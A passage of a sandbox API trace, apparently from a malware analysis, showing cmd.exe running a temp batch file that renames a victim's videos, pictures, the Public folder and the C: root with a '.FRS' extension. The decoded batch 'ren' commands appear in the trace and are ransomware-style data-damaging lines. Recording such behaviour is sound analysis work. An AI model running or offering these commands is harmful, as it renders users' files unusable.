lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0035.234] FindNextFileW (in: hFindFile=0xd18648, lpFindFileData=0xd17f78 | out: lpFindFileData=0xd17f78) returned 1 [0035.234] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\5JgHKoaOfdp\\Videos\\OHC _CGoPCkuxz.avi" (normalized: "c:\\users\\5jghkoaofdp\\videos\\ohc _cgopckuxz.avi"), lpNewFileName="C:\\Users\\5JgHKoaOfdp\\Videos\\OHC _CGoPCkuxz.avi.FRS" (normalized: "c:\\users\\5jghkoaofdp\\videos\\ohc _cgopckuxz.avi.frs"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0035.234] FindNextFileW (in: hFindFile=0xd18648, lpFindFileData=0xd17f78 | out: lpFindFileData=0xd17f78) returned 1 [0035.234] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\5JgHKoaOfdp\\Videos\\qPuChrfn1q.avi" (normalized: "c:\\users\\5jghkoaofdp\\videos\\qpuchrfn1q.avi"), lpNewFileName="C:\\Users\\5JgHKoaOfdp\\Videos\\qPuChrfn1q.avi.FRS" (normalized: "c:\\users\\5jghkoaofdp\\videos\\qpuchrfn1q.avi.frs"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0035.235] FindNextFileW (in: hFindFile=0xd18648, lpFindFileData=0xd17f78 | out: lpFindFileData=0xd17f78) returned 1 [0035.235] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\5JgHKoaOfdp\\Videos\\qTJQn-H2jwKxCan.mp4" (normalized: "c:\\users\\5jghkoaofdp\\videos\\qtjqn-h2jwkxcan.mp4"), lpNewFileName="C:\\Users\\5JgHKoaOfdp\\Videos\\qTJQn-H2jwKxCan.mp4.FRS" (normalized: "c:\\users\\5jghkoaofdp\\videos\\qtjqn-h2jwkxcan.mp4.frs"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0035.235] FindNextFileW (in: hFindFile=0xd18648, lpFindFileData=0xd17f78 | out: lpFindFileData=0xd17f78) returned 1 [0035.235] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\5JgHKoaOfdp\\Videos\\QZRHrIh83gk42.avi" (normalized: "c:\\users\\5jghkoaofdp\\videos\\qzrhrih83gk42.avi"), lpNewFileName="C:\\Users\\5JgHKoaOfdp\\Videos\\QZRHrIh83gk42.avi.FRS" (normalized: "c:\\users\\5jghkoaofdp\\videos\\qzrhrih83gk42.avi.frs"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0035.235] FindNextFileW (in: hFindFile=0xd18648, lpFindFileData=0xd17f78 | out: lpFindFileData=0xd17f78) returned 1 [0035.235] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\5JgHKoaOfdp\\Videos\\TtZk.avi" (normalized: "c:\\users\\5jghkoaofdp\\videos\\ttzk.avi"), lpNewFileName="C:\\Users\\5JgHKoaOfdp\\Videos\\TtZk.avi.FRS" (normalized: "c:\\users\\5jghkoaofdp\\videos\\ttzk.avi.frs"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0035.236] FindNextFileW (in: hFindFile=0xd18648, lpFindFileData=0xd17f78 | out: lpFindFileData=0xd17f78) returned 1 [0035.236] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\5JgHKoaOfdp\\Videos\\x6AY-7VC33bRCdpL.mkv" (normalized: "c:\\users\\5jghkoaofdp\\videos\\x6ay-7vc33brcdpl.mkv"), lpNewFileName="C:\\Users\\5JgHKoaOfdp\\Videos\\x6AY-7VC33bRCdpL.mkv.FRS" (normalized: "c:\\users\\5jghkoaofdp\\videos\\x6ay-7vc33brcdpl.mkv.frs"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0035.236] FindNextFileW (in: hFindFile=0xd18648, lpFindFileData=0xd17f78 | out: lpFindFileData=0xd17f78) returned 1 [0035.236] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\5JgHKoaOfdp\\Videos\\_1pm VIZTec.avi" (normalized: "c:\\users\\5jghkoaofdp\\videos\\_1pm viztec.avi"), lpNewFileName="C:\\Users\\5JgHKoaOfdp\\Videos\\_1pm VIZTec.avi.FRS" (normalized: "c:\\users\\5jghkoaofdp\\videos\\_1pm viztec.avi.frs"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0035.236] FindNextFileW (in: hFindFile=0xd18648, lpFindFileData=0xd17f78 | out: lpFindFileData=0xd17f78) returned 0 [0035.236] GetLastError () returned 0x12 [0035.236] FindClose (in: hFindFile=0xd18648 | out: hFindFile=0xd18648) returned 1 [0035.236] _get_osfhandle (_FileHandle=1) returned 0x28 [0035.236] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0035.237] _get_osfhandle (_FileHandle=1) returned 0x28 [0035.237] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0035.237] _get_osfhandle (_FileHandle=0) returned 0x24 [0035.237] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0035.237] SetConsoleInputExeNameW () returned 0x1 [0035.237] GetConsoleOutputCP () returned 0x1b5 [0035.238] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0035.238] SetThreadUILanguage (LangId=0x0) returned 0x409 [0035.238] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x94 [0035.238] _open_osfhandle (_OSFileHandle=0x94, _Flags=8) returned 3 [0035.238] _get_osfhandle (_FileHandle=3) returned 0x94 [0035.238] SetFilePointer (in: hFile=0x94, lDistanceToMove=435, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0035.238] _get_osfhandle (_FileHandle=3) returned 0x94 [0035.238] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0035.238] ReadFile (in: hFile=0x94, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0x8bb, lpOverlapped=0x0) returned 1 [0035.238] SetFilePointer (in: hFile=0x94, lDistanceToMove=483, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0035.238] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=48, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Pictures\\*.*\" *.*.FRS\r\n\n\r\np.txt\"')do set n=%%i\r\n") returned 48 [0035.238] GetFileType (hFile=0x94) returned 0x1 [0035.238] _get_osfhandle (_FileHandle=3) returned 0x94 [0035.238] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0035.239] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="5JgHKoaOfdp") returned 0xb [0035.239] _wcsicmp (_String1="ren", _String2=")") returned 73 [0035.239] _wcsicmp (_String1="FOR", _String2="ren") returned -12 [0035.239] _wcsicmp (_String1="FOR/?", _String2="ren") returned -12 [0035.239] _wcsicmp (_String1="IF", _String2="ren") returned -9 [0035.239] _wcsicmp (_String1="IF/?", _String2="ren") returned -9 [0035.239] _wcsicmp (_String1="REM", _String2="ren") returned -1 [0035.240] _wcsicmp (_String1="REM/?", _String2="ren") returned -1 [0035.240] _tell (_FileHandle=3) returned 483 [0035.240] _close (_FileHandle=3) returned 0 [0035.240] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0035.240] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0035.240] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0035.240] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0035.240] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0035.240] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0035.240] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0035.240] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0035.240] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0035.240] GetConsoleTitleW (in: lpConsoleTitle=0xc8edb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0035.240] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0035.240] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0035.240] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0035.240] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0035.240] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0035.240] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0035.240] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0035.240] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0035.240] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0035.240] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0035.240] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0035.240] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0xc8eb68, nVolumeNameSize=0x104, lpVolumeSerialNumber=0xc8eb60, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xc8eb60*=0xba2ee5af, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0035.241] _wcsicmp (_String1="*.*", _String2=".") returned -4 [0035.241] _wcsicmp (_String1="*.*", _String2="..") returned -4 [0035.241] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Pictures\\*.*" (normalized: "c:\\users\\5jghkoaofdp\\pictures\\*.*")) returned 0xffffffff [0035.241] GetLastError () returned 0x7b [0035.241] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xd18248 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0035.241] SetErrorMode (uMode=0x0) returned 0x0 [0035.241] SetErrorMode (uMode=0x1) returned 0x0 [0035.241] GetFullPathNameW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Pictures\\*.*", nBufferLength=0x104, lpBuffer=0xc8e4f8, lpFilePart=0xc8e4cc | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Pictures\\*.*", lpFilePart=0xc8e4cc*="*.*") returned 0x21 [0035.241] SetErrorMode (uMode=0x0) returned 0x1 [0035.241] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Pictures" (normalized: "c:\\users\\5jghkoaofdp\\pictures")) returned 0x11 [0035.241] _wcsicmp (_String1="*.*", _String2=".") returned -4 [0035.241] _wcsicmp (_String1="*.*", _String2="..") returned -4 [0035.241] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Pictures\\*.*" (normalized: "c:\\users\\5jghkoaofdp\\pictures\\*.*")) returned 0xffffffff [0035.241] GetLastError () returned 0x7b [0035.241] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Pictures\\*.*", fInfoLevelId=0x1, lpFindFileData=0xd17fe8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xd17fe8) returned 0xd27198 [0035.241] FindNextFileW (in: hFindFile=0xd27198, lpFindFileData=0xd17fe8 | out: lpFindFileData=0xd17fe8) returned 1 [0035.242] FindNextFileW (in: hFindFile=0xd27198, lpFindFileData=0xd17fe8 | out: lpFindFileData=0xd17fe8) returned 1 [0035.242] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\5JgHKoaOfdp\\Pictures\\AaERa.png" (normalized: "c:\\users\\5jghkoaofdp\\pictures\\aaera.png"), lpNewFileName="C:\\Users\\5JgHKoaOfdp\\Pictures\\AaERa.png.FRS" (normalized: "c:\\users\\5jghkoaofdp\\pictures\\aaera.png.frs"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0035.242] FindNextFileW (in: hFindFile=0xd27198, lpFindFileData=0xd17fe8 | out: lpFindFileData=0xd17fe8) returned 1 [0035.242] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\5JgHKoaOfdp\\Pictures\\bpC_m3AaMw.bmp" (normalized: "c:\\users\\5jghkoaofdp\\pictures\\bpc_m3aamw.bmp"), lpNewFileName="C:\\Users\\5JgHKoaOfdp\\Pictures\\bpC_m3AaMw.bmp.FRS" (normalized: "c:\\users\\5jghkoaofdp\\pictures\\bpc_m3aamw.bmp.frs"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0035.243] FindNextFileW (in: hFindFile=0xd27198, lpFindFileData=0xd17fe8 | out: lpFindFileData=0xd17fe8) returned 1 [0035.243] FindNextFileW (in: hFindFile=0xd27198, lpFindFileData=0xd17fe8 | out: lpFindFileData=0xd17fe8) returned 1 [0035.243] FindNextFileW (in: hFindFile=0xd27198, lpFindFileData=0xd17fe8 | out: lpFindFileData=0xd17fe8) returned 1 [0035.243] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\5JgHKoaOfdp\\Pictures\\DftnsFgTdnQy.bmp" (normalized: "c:\\users\\5jghkoaofdp\\pictures\\dftnsfgtdnqy.bmp"), lpNewFileName="C:\\Users\\5JgHKoaOfdp\\Pictures\\DftnsFgTdnQy.bmp.FRS" (normalized: "c:\\users\\5jghkoaofdp\\pictures\\dftnsfgtdnqy.bmp.frs"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0035.243] FindNextFileW (in: hFindFile=0xd27198, lpFindFileData=0xd17fe8 | out: lpFindFileData=0xd17fe8) returned 1 [0035.243] FindNextFileW (in: hFindFile=0xd27198, lpFindFileData=0xd17fe8 | out: lpFindFileData=0xd17fe8) returned 1 [0035.243] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\5JgHKoaOfdp\\Pictures\\q8XcgkV_0fAns40lOzVi.bmp" (normalized: "c:\\users\\5jghkoaofdp\\pictures\\q8xcgkv_0fans40lozvi.bmp"), lpNewFileName="C:\\Users\\5JgHKoaOfdp\\Pictures\\q8XcgkV_0fAns40lOzVi.bmp.FRS" (normalized: "c:\\users\\5jghkoaofdp\\pictures\\q8xcgkv_0fans40lozvi.bmp.frs"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0035.243] FindNextFileW (in: hFindFile=0xd27198, lpFindFileData=0xd17fe8 | out: lpFindFileData=0xd17fe8) returned 0 [0035.243] GetLastError () returned 0x12 [0035.243] FindClose (in: hFindFile=0xd27198 | out: hFindFile=0xd27198) returned 1 [0035.244] _get_osfhandle (_FileHandle=1) returned 0x28 [0035.244] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0035.244] _get_osfhandle (_FileHandle=1) returned 0x28 [0035.244] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0035.244] _get_osfhandle (_FileHandle=0) returned 0x24 [0035.244] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0035.244] SetConsoleInputExeNameW () returned 0x1 [0035.244] GetConsoleOutputCP () returned 0x1b5 [0035.245] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0035.245] SetThreadUILanguage (LangId=0x0) returned 0x409 [0035.245] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x94 [0035.245] _open_osfhandle (_OSFileHandle=0x94, _Flags=8) returned 3 [0035.245] _get_osfhandle (_FileHandle=3) returned 0x94 [0035.245] SetFilePointer (in: hFile=0x94, lDistanceToMove=483, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0035.245] _get_osfhandle (_FileHandle=3) returned 0x94 [0035.245] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0035.245] ReadFile (in: hFile=0x94, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0x88b, lpOverlapped=0x0) returned 1 [0035.245] SetFilePointer (in: hFile=0x94, lDistanceToMove=518, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0035.245] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="ren \"C:\\Users\\Public\\*.*\" *.*.FRS\r\n.*\" *.*.FRS\r\n\n\r\np.txt\"')do set n=%%i\r\n") returned 35 [0035.245] GetFileType (hFile=0x94) returned 0x1 [0035.245] _get_osfhandle (_FileHandle=3) returned 0x94 [0035.245] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0035.246] _wcsicmp (_String1="ren", _String2=")") returned 73 [0035.246] _wcsicmp (_String1="FOR", _String2="ren") returned -12 [0035.246] _wcsicmp (_String1="FOR/?", _String2="ren") returned -12 [0035.246] _wcsicmp (_String1="IF", _String2="ren") returned -9 [0035.246] _wcsicmp (_String1="IF/?", _String2="ren") returned -9 [0035.246] _wcsicmp (_String1="REM", _String2="ren") returned -1 [0035.246] _wcsicmp (_String1="REM/?", _String2="ren") returned -1 [0035.246] _tell (_FileHandle=3) returned 518 [0035.246] _close (_FileHandle=3) returned 0 [0035.246] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0035.246] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0035.246] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0035.246] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0035.246] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0035.246] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0035.246] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0035.246] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0035.246] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0035.246] GetConsoleTitleW (in: lpConsoleTitle=0xc8edb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0035.247] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0035.247] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0035.247] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0035.247] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0035.247] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0035.247] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0035.247] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0035.247] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0035.247] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0035.247] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0035.247] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0035.247] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0xc8eb68, nVolumeNameSize=0x104, lpVolumeSerialNumber=0xc8eb60, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xc8eb60*=0xba2ee5af, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0035.247] _wcsicmp (_String1="*.*", _String2=".") returned -4 [0035.247] _wcsicmp (_String1="*.*", _String2="..") returned -4 [0035.247] GetFileAttributesW (lpFileName="C:\\Users\\Public\\*.*" (normalized: "c:\\users\\public\\*.*")) returned 0xffffffff [0035.247] GetLastError () returned 0x7b [0035.247] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xd18228 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0035.247] SetErrorMode (uMode=0x0) returned 0x0 [0035.247] SetErrorMode (uMode=0x1) returned 0x0 [0035.247] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\*.*", nBufferLength=0x104, lpBuffer=0xc8e4f8, lpFilePart=0xc8e4cc | out: lpBuffer="C:\\Users\\Public\\*.*", lpFilePart=0xc8e4cc*="*.*") returned 0x13 [0035.247] SetErrorMode (uMode=0x0) returned 0x1 [0035.247] GetFileAttributesW (lpFileName="C:\\Users\\Public" (normalized: "c:\\users\\public")) returned 0x11 [0035.248] _wcsicmp (_String1="*.*", _String2=".") returned -4 [0035.248] _wcsicmp (_String1="*.*", _String2="..") returned -4 [0035.248] GetFileAttributesW (lpFileName="C:\\Users\\Public\\*.*" (normalized: "c:\\users\\public\\*.*")) returned 0xffffffff [0035.248] GetLastError () returned 0x7b [0035.248] FindFirstFileExW (in: lpFileName="C:\\Users\\Public\\*.*", fInfoLevelId=0x1, lpFindFileData=0xd17fc8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xd17fc8) returned 0xd271a8 [0035.248] FindNextFileW (in: hFindFile=0xd271a8, lpFindFileData=0xd17fc8 | out: lpFindFileData=0xd17fc8) returned 1 [0035.248] FindNextFileW (in: hFindFile=0xd271a8, lpFindFileData=0xd17fc8 | out: lpFindFileData=0xd17fc8) returned 1 [0035.248] FindNextFileW (in: hFindFile=0xd271a8, lpFindFileData=0xd17fc8 | out: lpFindFileData=0xd17fc8) returned 1 [0035.248] FindNextFileW (in: hFindFile=0xd271a8, lpFindFileData=0xd17fc8 | out: lpFindFileData=0xd17fc8) returned 1 [0035.248] FindNextFileW (in: hFindFile=0xd271a8, lpFindFileData=0xd17fc8 | out: lpFindFileData=0xd17fc8) returned 1 [0035.248] FindNextFileW (in: hFindFile=0xd271a8, lpFindFileData=0xd17fc8 | out: lpFindFileData=0xd17fc8) returned 1 [0035.248] FindNextFileW (in: hFindFile=0xd271a8, lpFindFileData=0xd17fc8 | out: lpFindFileData=0xd17fc8) returned 1 [0035.248] FindNextFileW (in: hFindFile=0xd271a8, lpFindFileData=0xd17fc8 | out: lpFindFileData=0xd17fc8) returned 1 [0035.248] FindNextFileW (in: hFindFile=0xd271a8, lpFindFileData=0xd17fc8 | out: lpFindFileData=0xd17fc8) returned 1 [0035.248] FindNextFileW (in: hFindFile=0xd271a8, lpFindFileData=0xd17fc8 | out: lpFindFileData=0xd17fc8) returned 0 [0035.248] FindClose (in: hFindFile=0xd271a8 | out: hFindFile=0xd271a8) returned 1 [0035.248] GetLastError () returned 0x12 [0035.248] FindFirstFileExW (in: lpFileName="C:\\Users\\Public\\*.*", fInfoLevelId=0x1, lpFindFileData=0xd17fc8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xd17fc8) returned 0xd271a8 [0035.248] FindClose (in: hFindFile=0xd271a8 | out: hFindFile=0xd271a8) returned 1 [0035.248] _get_osfhandle (_FileHandle=2) returned 0x2c [0035.248] GetFileType (hFile=0x2c) returned 0x2 [0035.248] GetStdHandle (nStdHandle=0xfffffff4) returned 0x2c [0035.248] GetConsoleMode (in: hConsoleHandle=0x2c, lpMode=0xc8e674 | out: lpMode=0xc8e674) returned 1 [0035.249] _get_osfhandle (_FileHandle=2) returned 0x2c [0035.249] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x2c, lpConsoleScreenBufferInfo=0xc8e6c4 | out: lpConsoleScreenBufferInfo=0xc8e6c4) returned 1 [0035.249] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x232a, dwLanguageId=0x0, lpBuffer=0x12c8840, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The syntax of the command is incorrect.\r\n") returned 0x29 [0035.249] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x232a, dwLanguageId=0x0, lpBuffer=0x12c8840, nSize=0x2000, Arguments=0xc8e6f4 | out: lpBuffer="The syntax of the command is incorrect.\r\n") returned 0x29 [0035.249] WriteConsoleW (in: hConsoleOutput=0x2c, lpBuffer=0x12c8840*, nNumberOfCharsToWrite=0x29, lpNumberOfCharsWritten=0xc8e6a8, lpReserved=0x0 | out: lpBuffer=0x12c8840*, lpNumberOfCharsWritten=0xc8e6a8*=0x29) returned 1 [0035.249] longjmp () [0035.249] _get_osfhandle (_FileHandle=1) returned 0x28 [0035.249] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0035.249] _get_osfhandle (_FileHandle=1) returned 0x28 [0035.250] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0035.250] _get_osfhandle (_FileHandle=0) returned 0x24 [0035.250] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0035.250] SetConsoleInputExeNameW () returned 0x1 [0035.250] GetConsoleOutputCP () returned 0x1b5 [0035.250] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0035.250] SetThreadUILanguage (LangId=0x0) returned 0x409 [0035.250] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x94 [0035.251] _open_osfhandle (_OSFileHandle=0x94, _Flags=8) returned 3 [0035.251] _get_osfhandle (_FileHandle=3) returned 0x94 [0035.251] SetFilePointer (in: hFile=0x94, lDistanceToMove=518, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0035.251] _get_osfhandle (_FileHandle=3) returned 0x94 [0035.251] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0035.251] ReadFile (in: hFile=0x94, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0x868, lpOverlapped=0x0) returned 1 [0035.251] SetFilePointer (in: hFile=0x94, lDistanceToMove=540, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0035.251] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="ren \"C:\\*.*\" *.*.FRS\r\n.*\" *.*.FRS\r\n.*\" *.*.FRS\r\n\n\r\np.txt\"')do set n=%%i\r\n") returned 22 [0035.251] GetFileType (hFile=0x94) returned 0x1 [0035.251] _get_osfhandle (_FileHandle=3) returned 0x94 [0035.251] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0035.251] _wcsicmp (_String1="ren", _String2=")") returned 73 [0035.252] _wcsicmp (_String1="FOR", _String2="ren") returned -12 [0035.252] _wcsicmp (_String1="FOR/?", _String2="ren") returned -12 [0035.252] _wcsicmp (_String1="IF", _String2="ren") returned -9 [0035.252] _wcsicmp (_String1="IF/?", _String2="ren") returned -9 [0035.252] _wcsicmp (_String1="REM", _String2="ren") returned -1 [0035.252] _wcsicmp (_String1="REM/?", _String2="ren") returned -1 [0035.252] _tell (_FileHandle=3) returned 540 [0035.252] _close (_FileHandle=3) returned 0 [0035.252] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0035.252] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0035.252] _wcsicmp (_String1="ren", 